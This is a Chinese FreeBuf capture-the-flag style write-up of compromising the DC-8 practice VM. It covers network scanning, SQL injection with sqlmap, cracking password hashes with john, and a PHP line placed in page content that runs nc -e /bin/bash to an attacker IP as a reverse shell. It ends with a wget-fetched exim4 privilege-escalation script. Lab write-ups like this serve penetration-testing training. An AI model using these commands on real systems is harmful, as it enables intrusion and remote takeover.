freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

DC系列靶机丨DC8
2023-01-26 14:53:46
所属地 四川省

信息收集

确定IP地址

netdiscover -i eth0 -r 192.168.84.0/24

image-20221221152434215


扫描端口

image-20221221152623543


nmap 漏洞扫描

nmap 192.168.84.184 -p 80 --script=vuln

image-20221221153028042


web测试

该页面可能存在SQL注入

image-20221221152946187

image-20221221152956237


SQLMAP

image-20221221153115393


跑库-跑表-跑字段

image-20221221153156822

image-20221221153235876


image-20221221153321325


image-20221221153406831


使用john解密

john --wordlist=/usr/share/john/password.lst --rules dc8.txt

image-20221221154129734

账户密码:john,turtle


登录成功

image-20221221154559739


文章处写反弹shell

<?php
exec("nc -e /bin/bash 192.168.84.174 10086");
?>

image-20221221155109040


邮件里面随便填写内容后提交

image-20221221155944523


获得shell

image-20221221160205725

e

提权

查看是否有可用的SUID提权

find / -user root -perm -4000 -print 2>/dev/null

image-20221221160402474


exim4

Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统

查看版本,4.0以上

image-20221221160706807


查询是否存在历史漏洞

image-20221221160902577


拷贝到当前目录

image-20221221160942418


http服务

攻击机开启http服务

image-20221221161328968


目标机将46996.sh文件使用wget 命令下载到本地

image-20221221161438974


添加执行权限

image-20221221161743070


image-20221221161731088


flag

image-20221221162030296


# 渗透测试 # web安全 # 漏洞分析 # 漏洞复现 # DC靶机
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录